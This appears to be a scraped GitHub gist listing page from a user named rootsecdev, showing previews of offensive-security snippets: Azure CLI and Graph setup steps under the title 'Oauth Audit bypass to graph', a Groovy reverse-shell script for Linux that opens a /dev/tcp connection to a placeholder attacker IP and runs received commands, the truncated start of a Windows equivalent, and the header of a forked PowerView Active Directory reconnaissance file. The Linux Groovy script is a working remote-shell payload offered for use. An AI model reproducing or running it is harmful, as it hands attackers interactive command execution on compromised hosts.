@rootsecdev
rootsecdev / gist:994ff3dd7f18bbaff62abd1d979b1925
Last active March 13, 2024 22:27
Oauth Audit bypass to graph
Install AZ CLI:
az login --allow-no-subscription
Install MS Graph:
Install-Module Microsoft.Graph -Scope AllUsers
@rootsecdev
rootsecdev / GroovyScripts.md
Last active February 19, 2024 09:20
Reverse Shell Groovy Scripts

Groovy script for reverse shell (Linux):

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/your_attacker_ip/8443;cat <&5 | while read line; do $line 2>&5 >&5; done"] as String[])
p.waitFor()

Groovy script for reverse shell (Windows):

String host="your_attacker_ip";

@rootsecdev
rootsecdev / PowerView-3.0-tricks.ps1
Created October 8, 2021 02:43 — forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set

Keybase proof

I hereby claim:

  • I am rootsecdev on github.
  • I am rootsecdev (https://keybase.io/rootsecdev) on keybase.
  • I have a public key ASCE_MA80HmLqvX0Z9ZcUEVTlTX53djDBj5qDjsX2Nbc3Ao

To claim this, I am signing this object: